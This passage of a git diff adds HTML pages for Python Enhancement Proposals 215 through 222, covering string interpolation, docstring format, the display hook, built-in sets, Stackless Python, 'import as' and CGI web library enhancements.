The string is scanned from start to end for the ‘$’ character +(\x24 in 8-bit strings or \u0024 in Unicode strings). If there +are no ‘$’ characters present, the string is returned unchanged.

+

Any ‘$’ found in the string, followed by one of the two kinds of +expressions described below, is replaced with the value of the +expression as evaluated in the current namespaces. The value is +converted with str() if the containing string is an 8-bit string, +or with unicode() if it is a Unicode string.

+
    +
  1. A Python identifier optionally followed by any number of +trailers, where a trailer consists of: +- a dot and an identifier, +- an expression enclosed in square brackets, or +- an argument list enclosed in parentheses +(This is exactly the pattern expressed in the Python grammar +by “NAME trailer*”, using the definitions in Grammar/Grammar.)
  2. +
  3. Any complete Python expression enclosed in curly braces.
  4. +
+

Two dollar-signs (“$$”) are replaced with a single “$”.

+
+
+

Examples

+

Here is an example of an interactive session exhibiting the +expected behaviour of this feature.

+
>>> a, b = 5, 6
+>>> print $'a = $a, b = $b'
+a = 5, b = 6
+>>> $u'uni${a}ode'
+u'uni5ode'
+>>> print $'\$a'
+5
+>>> print $r'\$a'
+\5
+>>> print $'$$$a.$b'
+$5.6
+>>> print $'a + b = ${a + b}'
+a + b = 11
+>>> import sys
+>>> print $'References to $a: $sys.getrefcount(a)'
+References to 5: 15
+>>> print $"sys = $sys, sys = $sys.modules['sys']"
+sys = <module 'sys' (built-in)>, sys = <module 'sys' (built-in)>
+>>> print $'BDFL = $sys.copyright.split()[4].upper()'
+BDFL = GUIDO
+
+
+
+
+

Discussion

+

‘$’ is chosen as the interpolation character within the +string for the sake of familiarity, since it is already used +for this purpose in many other languages and contexts.

+

It is then natural to choose ‘$’ as a prefix, since it is a +mnemonic for the interpolation character.

+

Trailers are permitted to give this interpolation mechanism +even more power than the interpolation available in most other +languages, while the expression to be interpolated remains +clearly visible and free of curly braces.

+

‘$’ works like an operator and could be implemented as an +operator, but that prevents the compile-time optimization +and presents security issues. So, it is only allowed as a +string prefix.

+
+
+

Security Issues

+

“$” has the power to eval, but only to eval a literal. As +described here (a string prefix rather than an operator), it +introduces no new security issues since the expressions to be +evaluated must be literally present in the code.

+
+
+

Implementation

+

The Itpl module at [1] provides a +prototype of this feature. It uses the tokenize module to find +the end of an expression to be interpolated, then calls eval() +on the expression each time a value is needed. In the prototype, +the expression is parsed and compiled again each time it is +evaluated.

+

As an optimization, interpolated strings could be compiled +directly into the corresponding bytecode; that is,

+
$'a = $a, b = $b'
+
+
+

could be compiled as though it were the expression

+
('a = ' + str(a) + ', b = ' + str(b))
+
+
+

so that it only needs to be compiled once.

+
+
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0215.rst

+

Last modified: 2024-04-14 13:35:25 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0216/index.html b/pep-0216/index.html new file mode 100644 index 00000000000..e9bde632e69 --- /dev/null +++ b/pep-0216/index.html @@ -0,0 +1,262 @@ + + + + + + + + PEP 216 – Docstring Format | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 216 – Docstring Format

+
+
Author:
+
Moshe Zadka <moshez at zadka.site.co.il>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
31-Jul-2000
+
Post-History:
+

+
Superseded-By:
+
287
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP has been withdrawn.

+

×

+

It has been superseded by PEP 287.

+

+
+
+

Abstract

+

Named Python objects, such as modules, classes and functions, have a +string attribute called __doc__. If the first expression inside +the definition is a literal string, that string is assigned +to the __doc__ attribute.

+

The __doc__ attribute is called a documentation string, or docstring. +It is often used to summarize the interface of the module, class or +function. However, since there is no common format for documentation +string, tools for extracting docstrings and transforming those into +documentation in a standard format (e.g., DocBook) have not sprang +up in abundance, and those that do exist are for the most part +unmaintained and unused.

+
+
+

Perl Documentation

+

In Perl, most modules are documented in a format called POD – Plain +Old Documentation. This is an easy-to-type, very low level format +which integrates well with the Perl parser. Many tools exist to turn +POD documentation into other formats: info, HTML and man pages, among +others. However, in Perl, the information is not available at run-time.

+
+
+

Java Documentation

+

In Java, special comments before classes and functions function to +document the code. A program to extract these, and turn them into +HTML documentation is called javadoc, and is part of the standard +Java distribution. However, the only output format that is supported +is HTML, and JavaDoc has a very intimate relationship with HTML.

+
+
+

Python Docstring Goals

+

Python documentation string are easy to spot during parsing, and are +also available to the runtime interpreter. This double purpose is +a bit problematic, sometimes: for example, some are reluctant to have +too long docstrings, because they do not want to take much space in +the runtime. In addition, because of the current lack of tools, people +read objects’ docstrings by “print”ing them, so a tendency to make them +brief and free of markups has sprung up. This tendency hinders writing +better documentation-extraction tools, since it causes docstrings to +contain little information, which is hard to parse.

+
+
+

High Level Solutions

+

To counter the objection that the strings take up place in the running +program, it is suggested that documentation extraction tools will +concatenate a maximum prefix of string literals which appear in the +beginning of a definition. The first of these will also be available +in the interactive interpreter, so it should contain a few summary +lines.

+
+
+

Docstring Format Goals

+

These are the goals for the docstring format, as discussed ad nauseam +in the doc-sig.

+
    +
  1. It must be easy to type with any standard text editor.
  2. +
  3. It must be readable to the casual observer.
  4. +
  5. It must not contain information which can be deduced from parsing +the module.
  6. +
  7. It must contain sufficient information so it can be converted +to any reasonable markup format.
  8. +
  9. It must be possible to write a module’s entire documentation in +docstrings, without feeling hampered by the markup language.
  10. +
+
+
+

Docstring Contents

+

For requirement 5. above, it is needed to specify what must be +in docstrings.

+

At least the following must be available:

+
    +
  1. A tag that means “this is a Python something, guess what”

    Example: In the sentence “The POP3 class”, we need to markup “POP3” +so. The parser will be able to guess it is a class from the contents +of the poplib module, but we need to make it guess.

    +
  2. +
  3. Tags that mean “this is a Python class/module/class var/instance var…”

    Example: The usual Python idiom for singleton class A is to have _A +as the class, and A a function which returns _A objects. It’s usual +to document the class, nonetheless, as being A. This requires the +strength to say “The class A” and have A hyperlinked and marked-up +as a class.

    +
  4. +
  5. An easy way to include Python source code/Python interactive sessions
  6. +
  7. Emphasis/bold
  8. +
  9. List/tables
  10. +
+
+
+

Docstring Basic Structure

+

The documentation strings will be in StructuredTextNG +(http://www.zope.org/Members/jim/StructuredTextWiki/StructuredTextNG) +Since StructuredText is not yet strong enough to handle (a) and (b) +above, we will need to extend it. I suggest using +[<optional description>:python identifier]. +E.g.: [class:POP3], [:POP3.list], etc. If the description is missing, +a guess will be made from the text.

+
+
+

Unresolved Issues

+

Is there a way to escape characters in ST? If so, how? +(example: * at the beginning of a line without being bullet symbol)

+

Is my suggestion above for Python symbols compatible with ST-NG? +How hard would it be to extend ST-NG to support it?

+

How do we describe input and output types of functions?

+

What additional constraint do we enforce on each docstring? +(module/class/function)?

+

What are the guesser rules?

+
+
+

Rejected Suggestions

+

XML – it’s very hard to type, and too cluttered to read it comfortably.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0216.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0217/index.html b/pep-0217/index.html new file mode 100644 index 00000000000..eaa9cc0c8fe --- /dev/null +++ b/pep-0217/index.html @@ -0,0 +1,172 @@ + + + + + + + + PEP 217 – Display Hook for Interactive Use | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 217 – Display Hook for Interactive Use

+
+
Author:
+
Moshe Zadka <moshez at zadka.site.co.il>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
31-Jul-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Python’s interactive mode is one of the implementation’s great +strengths – being able to write expressions on the command line +and get back a meaningful output. However, the output function +cannot be all things to all people, and the current output +function too often falls short of this goal. This PEP describes a +way to provides alternatives to the built-in display function in +Python, so users will have control over the output from the +interactive interpreter.

+
+
+

Interface

+

The current Python solution has worked for many users, and this +should not break it. Therefore, in the default configuration, +nothing will change in the REPL loop. To change the way the +interpreter prints interactively entered expressions, users +will have to rebind sys.displayhook to a callable object. +The result of calling this object with the result of the +interactively entered expression should be print-able, +and this is what will be printed on sys.stdout.

+
+
+

Solution

+

The bytecode PRINT_EXPR will call sys.displayhook(POP()). +A displayhook() will be added to the sys builtin module, which is +equivalent to:

+
import __builtin__
+def displayhook(o):
+    if o is None:
+        return
+    __builtin__._ = None
+    print `o`
+    __builtin__._ = o
+
+
+
+
+

Jython Issues

+

The method Py.printResult will be similarly changed.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0217.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0218/index.html b/pep-0218/index.html new file mode 100644 index 00000000000..e078f6a6f08 --- /dev/null +++ b/pep-0218/index.html @@ -0,0 +1,347 @@ + + + + + + + + PEP 218 – Adding a Built-In Set Object Type | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 218 – Adding a Built-In Set Object Type

+
+
Author:
+
Greg Wilson <gvwilson at ddj.com>, Raymond Hettinger <python at rcn.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
31-Jul-2000
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP proposes adding a Set module to the standard Python +library, and to then make sets a built-in Python type if that +module is widely used. After explaining why sets are desirable, +and why the common idiom of using dictionaries in their place is +inadequate, we describe how we intend built-in sets to work, and +then how the preliminary Set module will behave. The last +section discusses the mutability (or otherwise) of sets and set +elements, and the solution which the Set module will implement.

+
+
+

Rationale

+

Sets are a fundamental mathematical structure, and are very +commonly used in algorithm specifications. They are much less +frequently used in implementations, even when they are the “right” +structure. Programmers frequently use lists instead, even when +the ordering information in lists is irrelevant, and by-value +lookups are frequent. (Most medium-sized C programs contain a +depressing number of start-to-end searches through malloc’d +vectors to determine whether particular items are present or +not…)

+

Programmers are often told that they can implement sets as +dictionaries with “don’t care” values. Items can be added to +these “sets” by assigning the “don’t care” value to them; +membership can be tested using dict.has_key; and items can be +deleted using del. However, the other main operations on sets +(union, intersection, and difference) are not directly supported +by this representation, since their meaning is ambiguous for +dictionaries containing key/value pairs.

+
+
+

Proposal

+

The long-term goal of this PEP is to add a built-in set type to +Python. This type will be an unordered collection of unique +values, just as a dictionary is an unordered collection of +key/value pairs.

+

Iteration and comprehension will be implemented in the obvious +ways, so that:

+
for x in S:
+
+
+

will step through the elements of S in arbitrary order, while:

+
set(x**2 for x in S)
+
+
+

will produce a set containing the squares of all elements in S, +Membership will be tested using in and not in, and basic set +operations will be implemented by a mixture of overloaded +operators:

+ + + + + + + + + + + + + + + + + + + + + +
|union
&intersection
^symmetric difference
-asymmetric difference
== !=equality and inequality tests
< <= >= >subset and superset tests
+

and methods:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
S.add(x)Add “x” to the set.
S.update(s)Add all elements of sequence “s” to the set.
S.remove(x)Remove “x” from the set. If “x” is not +present, this method raises a LookupError +exception.
S.discard(x)Remove “x” from the set if it is present, or +do nothing if it is not.
S.pop()Remove and return an arbitrary element, +raising a LookupError if the element is +not present.
S.clear()Remove all elements from this set.
S.copy()Make a new set.
s.issuperset()Check for a superset relationship.
s.issubset()Check for a subset relationship.
+

and two new built-in conversion functions:

+ + + + + + + + + +
set(x)Create a set containing the elements of the +collection “x”.
frozenset(x)Create an immutable set containing the elements +of the collection “x”.
+

Notes:

+
    +
  1. We propose using the bitwise operators “|&” for intersection +and union. While “+” for union would be intuitive, “*” for +intersection is not (very few of the people asked guessed what +it did correctly).
  2. +
  3. We considered using “+” to add elements to a set, rather than +“add”. However, Guido van Rossum pointed out that “+” is +symmetric for other built-in types (although “*” is not). Use +of “add” will also avoid confusion between that operation and +set union.
  4. +
+
+
+

Set Notation

+

The PEP originally proposed {1,2,3} as the set notation and {-} for +the empty set. Experience with Python 2.3’s sets.py showed that +the notation was not necessary. Also, there was some risk of making +dictionaries less instantly recognizable.

+

It was also contemplated that the braced notation would support set +comprehensions; however, Python 2.4 provided generator expressions +which fully met that need and did so it a more general way. +(See PEP 289 for details on generator expressions).

+

So, Guido ruled that there would not be a set syntax; however, the +issue could be revisited for Python 3000 (see PEP 3000).

+
+
+

History

+

To gain experience with sets, a pure python module was introduced +in Python 2.3. Based on that implementation, the set and frozenset +types were introduced in Python 2.4. The improvements are:

+
    +
  • Better hash algorithm for frozensets
  • +
  • More compact pickle format (storing only an element list +instead of a dictionary of key:value pairs where the value +is always True).
  • +
  • Use a __reduce__ function so that deep copying is automatic.
  • +
  • The BaseSet concept was eliminated.
  • +
  • The union_update() method became just update().
  • +
  • Auto-conversion between mutable and immutable sets was dropped.
  • +
  • The _repr method was dropped (the need is met by the new +sorted() built-in function).
  • +
+

Tim Peters believes that the class’s constructor should take a +single sequence as an argument, and populate the set with that +sequence’s elements. His argument is that in most cases, +programmers will be creating sets from pre-existing sequences, so +that this case should be the common one. However, this would +require users to remember an extra set of parentheses when +initializing a set with known values:

+
>>> Set((1, 2, 3, 4))       # case 1
+
+
+

On the other hand, feedback from a small number of novice Python +users (all of whom were very experienced with other languages) +indicates that people will find a “parenthesis-free” syntax more +natural:

+
>>> Set(1, 2, 3, 4)         # case 2
+
+
+

Ultimately, we adopted the first strategy in which the initializer +takes a single iterable argument.

+
+
+

Mutability

+

The most difficult question to resolve in this proposal was +whether sets ought to be able to contain mutable elements. A +dictionary’s keys must be immutable in order to support fast, +reliable lookup. While it would be easy to require set elements +to be immutable, this would preclude sets of sets (which are +widely used in graph algorithms and other applications).

+

Earlier drafts of PEP 218 had only a single set type, but the +sets.py implementation in Python 2.3 has two, Set and +ImmutableSet. For Python 2.4, the new built-in types were named +set and frozenset which are slightly less cumbersome.

+

There are two classes implemented in the “sets” module. Instances +of the Set class can be modified by the addition or removal of +elements, and the ImmutableSet class is “frozen”, with an +unchangeable collection of elements. Therefore, an ImmutableSet +may be used as a dictionary key or as a set element, but cannot be +updated. Both types of set require that their elements are +immutable, hashable objects. Parallel comments apply to the “set” +and “frozenset” built-in types.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0218.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0219/index.html b/pep-0219/index.html new file mode 100644 index 00000000000..1522e8e7db3 --- /dev/null +++ b/pep-0219/index.html @@ -0,0 +1,294 @@ + + + + + + + + PEP 219 – Stackless Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 219 – Stackless Python

+
+
Author:
+
Gordon McMillan <gmcm at hypernet.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
14-Aug-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP discusses changes required to core Python in order to +efficiently support generators, microthreads and coroutines. It is +related to PEP 220, which describes how Python should be extended +to support these facilities. The focus of this PEP is strictly on +the changes required to allow these extensions to work.

+

While these PEPs are based on Christian Tismer’s Stackless [1] +implementation, they do not regard Stackless as a reference +implementation. Stackless (with an extension module) implements +continuations, and from continuations one can implement +coroutines, microthreads (as has been done by Will Ware [2]) and +generators. But in more than a year, no one has found any other +productive use of continuations, so there seems to be no demand +for their support.

+

However, Stackless support for continuations is a relatively minor +piece of the implementation, so one might regard it as “a” +reference implementation (rather than “the” reference +implementation).

+
+
+

Background

+

Generators and coroutines have been implemented in a number of +languages in a number of ways. Indeed, Tim Peters has done pure +Python implementations of generators [3] and coroutines [4] using +threads (and a thread-based coroutine implementation exists for +Java). However, the horrendous overhead of a thread-based +implementation severely limits the usefulness of this approach.

+

Microthreads (a.k.a “green” or “user” threads) and coroutines +involve transfers of control that are difficult to accommodate in +a language implementation based on a single stack. (Generators can +be done on a single stack, but they can also be regarded as a very +simple case of coroutines.)

+

Real threads allocate a full-sized stack for each thread of +control, and this is the major source of overhead. However, +coroutines and microthreads can be implemented in Python in a way +that involves almost no overhead. This PEP, therefore, offers a +way for making Python able to realistically manage thousands of +separate “threads” of activity (vs. today’s limit of perhaps dozens +of separate threads of activity).

+

Another justification for this PEP (explored in PEP 220) is that +coroutines and generators often allow a more direct expression of +an algorithm than is possible in today’s Python.

+
+
+

Discussion

+

The first thing to note is that Python, while it mingles +interpreter data (normal C stack usage) with Python data (the +state of the interpreted program) on the stack, the two are +logically separate. They just happen to use the same stack.

+

A real thread gets something approaching a process-sized stack +because the implementation has no way of knowing how much stack +space the thread will require. The stack space required for an +individual frame is likely to be reasonable, but stack switching +is an arcane and non-portable process, not supported by C.

+

Once Python stops putting Python data on the C stack, however, +stack switching becomes easy.

+

The fundamental approach of the PEP is based on these two +ideas. First, separate C’s stack usage from Python’s stack +usage. Secondly, associate with each frame enough stack space to +handle that frame’s execution.

+

In the normal usage, Stackless Python has a normal stack +structure, except that it is broken into chunks. But in the +presence of a coroutine / microthread extension, this same +mechanism supports a stack with a tree structure. That is, an +extension can support transfers of control between frames outside +the normal “call / return” path.

+
+
+

Problems

+

The major difficulty with this approach is C calling Python. The +problem is that the C stack now holds a nested execution of the +byte-code interpreter. In that situation, a coroutine / +microthread extension cannot be permitted to transfer control to a +frame in a different invocation of the byte-code interpreter. If a +frame were to complete and exit back to C from the wrong +interpreter, the C stack could be trashed.

+

The ideal solution is to create a mechanism where nested +executions of the byte code interpreter are never needed. The easy +solution is for the coroutine / microthread extension(s) to +recognize the situation and refuse to allow transfers outside the +current invocation.

+

We can categorize code that involves C calling Python into two +camps: Python’s implementation, and C extensions. And hopefully we +can offer a compromise: Python’s internal usage (and C extension +writers who want to go to the effort) will no longer use a nested +invocation of the interpreter. Extensions which do not go to the +effort will still be safe, but will not play well with coroutines +/ microthreads.

+

Generally, when a recursive call is transformed into a loop, a bit +of extra bookkeeping is required. The loop will need to keep its +own “stack” of arguments and results since the real stack can now +only hold the most recent. The code will be more verbose, because +it’s not quite as obvious when we’re done. While Stackless is not +implemented this way, it has to deal with the same issues.

+

In normal Python, PyEval_EvalCode is used to build a frame and +execute it. Stackless Python introduces the concept of a +FrameDispatcher. Like PyEval_EvalCode, it executes one frame. But +the interpreter may signal the FrameDispatcher that a new frame +has been swapped in, and the new frame should be executed. When a +frame completes, the FrameDispatcher follows the back pointer to +resume the “calling” frame.

+

So Stackless transforms recursions into a loop, but it is not the +FrameDispatcher that manages the frames. This is done by the +interpreter (or an extension that knows what it’s doing).

+

The general idea is that where C code needs to execute Python +code, it creates a frame for the Python code, setting its back +pointer to the current frame. Then it swaps in the frame, signals +the FrameDispatcher and gets out of the way. The C stack is now +clean - the Python code can transfer control to any other frame +(if an extension gives it the means to do so).

+

In the vanilla case, this magic can be hidden from the programmer +(even, in most cases, from the Python-internals programmer). Many +situations present another level of difficulty, however.

+

The map builtin function involves two obstacles to this +approach. It cannot simply construct a frame and get out of the +way, not just because there’s a loop involved, but each pass +through the loop requires some “post” processing. In order to play +well with others, Stackless constructs a frame object for map +itself.

+

Most recursions of the interpreter are not this complex, but +fairly frequently, some “post” operations are required. Stackless +does not fix these situations because of the amount of code changes +required. Instead, Stackless prohibits transfers out of a nested +interpreter. While not ideal (and sometimes puzzling), this +limitation is hardly crippling.

+
+
+

Advantages

+

For normal Python, the advantage to this approach is that C stack +usage becomes much smaller and more predictable. Unbounded +recursion in Python code becomes a memory error, instead of a +stack error (and thus, in non-Cupertino operating systems, +something that can be recovered from). The price, of course, is +the added complexity that comes from transforming recursions of +the byte-code interpreter loop into a higher order loop (and the +attendant bookkeeping involved).

+

The big advantage comes from realizing that the Python stack is +really a tree, and the frame dispatcher can transfer control +freely between leaf nodes of the tree, thus allowing things like +microthreads and coroutines.

+
+
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0219.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0220/index.html b/pep-0220/index.html new file mode 100644 index 00000000000..4368c201687 --- /dev/null +++ b/pep-0220/index.html @@ -0,0 +1,139 @@ + + + + + + + + PEP 220 – Coroutines, Generators, Continuations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 220 – Coroutines, Generators, Continuations

+
+
Author:
+
Gordon McMillan <gmcm at hypernet.com>
+
Status:
+
Rejected
+
Type:
+
Informational
+
Created:
+
14-Aug-2000
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Warning

+

This PEP has been rejected.

+

×

+

+
+
+

Abstract

+

Demonstrates why the changes described in the stackless PEP are +desirable. A low-level continuations module exists. With it, +coroutines and generators and “green” threads can be written. A +higher level module that makes coroutines and generators easy to +create is desirable (and being worked on). The focus of this PEP +is on showing how coroutines, generators, and green threads can +simplify common programming problems.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0220.rst

+

Last modified: 2024-04-14 13:35:25 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0221/index.html b/pep-0221/index.html new file mode 100644 index 00000000000..d34af13223c --- /dev/null +++ b/pep-0221/index.html @@ -0,0 +1,231 @@ + + + + + + + + PEP 221 – Import As | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 221 – Import As

+
+
Author:
+
Thomas Wouters <thomas at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Aug-2000
+
Python-Version:
+
2.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP describes the import as proposal for Python 2.0. This +PEP tracks the status and ownership of this feature. It contains +a description of the feature and outlines changes necessary to +support the feature. The CVS revision history of this file +contains the definitive historical record.

+
+
+

Rationale

+

This PEP proposes an extension of Python syntax regarding the +import and from <module> import statements. These statements +load in a module, and either bind that module to a local name, or +binds objects from that module to a local name. However, it is +sometimes desirable to bind those objects to a different name, for +instance to avoid name clashes. This can currently be achieved +using the following idiom:

+
import os
+real_os = os
+del os
+
+
+

And similarly for the from ... import statement:

+
from os import fdopen, exit, stat
+os_fdopen = fdopen
+os_stat = stat
+del fdopen, stat
+
+
+

The proposed syntax change would add an optional as clause to +both these statements, as follows:

+
import os as real_os
+from os import fdopen as os_fdopen, exit, stat as os_stat
+
+
+

The as name is not intended to be a keyword, and some trickery +has to be used to convince the CPython parser it isn’t one. For +more advanced parsers/tokenizers, however, this should not be a +problem.

+

A slightly special case exists for importing sub-modules. The +statement

+
import os.path
+
+
+

stores the module os locally as os, so that the imported +submodule path is accessible as os.path. As a result,

+
import os.path as p
+
+
+

stores os.path, not os, in p. This makes it effectively the +same as

+
from os import path as p
+
+
+
+
+

Implementation details

+

This PEP has been accepted, and the suggested code change has been +checked in. The patch can still be found in the SourceForge patch +manager [1]. Currently, a NAME field is used in the grammar rather +than a bare string, to avoid the keyword issue. It introduces a +new bytecode, IMPORT_STAR, which performs the from module import +* behaviour, and changes the behaviour of the IMPORT_FROM +bytecode so that it loads the requested name (which is always a +single name) onto the stack, to be subsequently stored by a STORE +opcode. As a result, all names explicitly imported now follow the +global directives.

+

The special case of from module import * remains a special case, +in that it cannot accommodate an as clause, and that no STORE +opcodes are generated; the objects imported are loaded directly +into the local namespace. This also means that names imported in +this fashion are always local, and do not follow the global +directive.

+

An additional change to this syntax has also been suggested, to +generalize the expression given after the as clause. Rather +than a single name, it could be allowed to be any expression that +yields a valid l-value; anything that can be assigned to. The +change to accommodate this is minimal, as the patch [2] proves, and +the resulting generalization allows a number of new constructs +that run completely parallel with other Python assignment +constructs. However, this idea has been rejected by Guido, as +“hypergeneralization”.

+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0221.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0222/index.html b/pep-0222/index.html new file mode 100644 index 00000000000..1d07d2eb594 --- /dev/null +++ b/pep-0222/index.html @@ -0,0 +1,367 @@ + + + + + + + + PEP 222 – Web Library Enhancements | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 222 – Web Library Enhancements

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
18-Aug-2000
+
Python-Version:
+
2.1
+
Post-History:
+
22-Dec-2000
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a set of enhancements to the CGI development +facilities in the Python standard library. Enhancements might be +new features, new modules for tasks such as cookie support, or +removal of obsolete code.

+

The original intent was to make improvements to Python 2.1. +However, there seemed little interest from the Python community, +and time was lacking, so this PEP has been deferred to some future +Python release.

+
+
+

Open Issues

+

This section lists changes that have been suggested, but about +which no firm decision has yet been made. In the final version of +this PEP, this section should be empty, as all the changes should +be classified as accepted or rejected.

+

cgi.py: We should not be told to create our own subclass just so +we can handle file uploads. As a practical matter, I have yet to +find the time to do this right, so I end up reading cgi.py’s temp +file into, at best, another file. Some of our legacy code actually +reads it into a second temp file, then into a final destination! +And even if we did, that would mean creating yet another object +with its __init__ call and associated overhead.

+

cgi.py: Currently, query data with no = are ignored. Even if +keep_blank_values is set, queries like ...?value=&... are +returned with blank values but queries like ...?value&... are +completely lost. It would be great if such data were made +available through the FieldStorage interface, either as entries +with None as values, or in a separate list.

+

Utility function: build a query string from a list of 2-tuples

+

Dictionary-related utility classes: NoKeyErrors (returns an empty +string, never a KeyError), PartialStringSubstitution (returns +the original key string, never a KeyError)

+
+
+

New Modules

+

This section lists details about entire new packages or modules +that should be added to the Python standard library.

+
    +
  • fcgi.py : A new module adding support for the FastCGI protocol. +Robin Dunn’s code needs to be ported to Windows, though.
  • +
+
+
+

Major Changes to Existing Modules

+

This section lists details of major changes to existing modules, +whether in implementation or in interface. The changes in this +section therefore carry greater degrees of risk, either in +introducing bugs or a backward incompatibility.

+

The cgi.py module would be deprecated. (XXX A new module or +package name hasn’t been chosen yet: ‘web’? ‘cgilib’?)

+
+
+

Minor Changes to Existing Modules

+

This section lists details of minor changes to existing modules. +These changes should have relatively small implementations, and +have little risk of introducing incompatibilities with previous +versions.

+
+
+

Rejected Changes

+

The changes listed in this section were proposed for Python 2.1, +but were rejected as unsuitable. For each rejected change, a +rationale is given describing why the change was deemed +inappropriate.

+
    +
  • An HTML generation module is not part of this PEP. Several such +modules exist, ranging from HTMLgen’s purely programming +interface to ASP-inspired simple templating to DTML’s complex +templating. There’s no indication of which templating module to +enshrine in the standard library, and that probably means that +no module should be so chosen.
  • +
  • cgi.py: Allowing a combination of query data and POST data. +This doesn’t seem to be standard at all, and therefore is +dubious practice.
  • +
+
+
+

Proposed Interface

+

XXX open issues: naming convention (studlycaps or +underline-separated?); need to look at the cgi.parse*() functions +and see if they can be simplified, too.

+

Parsing functions: carry over most of the parse* functions from +cgi.py

+
# The Response class borrows most of its methods from Zope's
+# HTTPResponse class.
+
+class Response:
+    """
+    Attributes:
+    status: HTTP status code to return
+    headers: dictionary of response headers
+    body: string containing the body of the HTTP response
+    """
+
+    def __init__(self, status=200, headers={}, body=""):
+        pass
+
+    def setStatus(self, status, reason=None):
+        "Set the numeric HTTP response code"
+        pass
+
+    def setHeader(self, name, value):
+        "Set an HTTP header"
+        pass
+
+    def setBody(self, body):
+        "Set the body of the response"
+        pass
+
+    def setCookie(self, name, value,
+                  path = '/',
+                  comment = None,
+                  domain = None,
+                  max-age = None,
+                  expires = None,
+                  secure = 0
+                  ):
+        "Set a cookie"
+        pass
+
+    def expireCookie(self, name):
+        "Remove a cookie from the user"
+        pass
+
+    def redirect(self, url):
+        "Redirect the browser to another URL"
+        pass
+
+    def __str__(self):
+        "Convert entire response to a string"
+        pass
+
+    def dump(self):
+        "Return a string representation useful for debugging"
+        pass
+
+    # XXX methods for specific classes of error:serverError,
+    # badRequest, etc.?
+
+
+class Request:
+
+    """
+    Attributes:
+
+    XXX should these be dictionaries, or dictionary-like objects?
+    .headers : dictionary containing HTTP headers
+    .cookies : dictionary of cookies
+    .fields  : data from the form
+    .env     : environment dictionary
+    """
+
+    def __init__(self, environ=os.environ, stdin=sys.stdin,
+                 keep_blank_values=1, strict_parsing=0):
+        """Initialize the request object, using the provided environment
+        and standard input."""
+        pass
+
+    # Should people just use the dictionaries directly?
+    def getHeader(self, name, default=None):
+        pass
+
+    def getCookie(self, name, default=None):
+        pass
+
+    def getField(self, name, default=None):
+        "Return field's value as a string (even if it's an uploaded file)"
+        pass
+
+    def getUploadedFile(self, name):
+        """Returns a file object that can be read to obtain the contents
+        of an uploaded file.  XXX should this report an error if the
+        field isn't actually an uploaded file?  Or should it wrap
+        a StringIO around simple fields for consistency?
+        """
+
+    def getURL(self, n=0, query_string=0):
+        """Return the URL of the current request, chopping off 'n' path
+        components from the right.  Eg. if the URL is
+        "http://foo.com/bar/baz/quux", n=2 would return
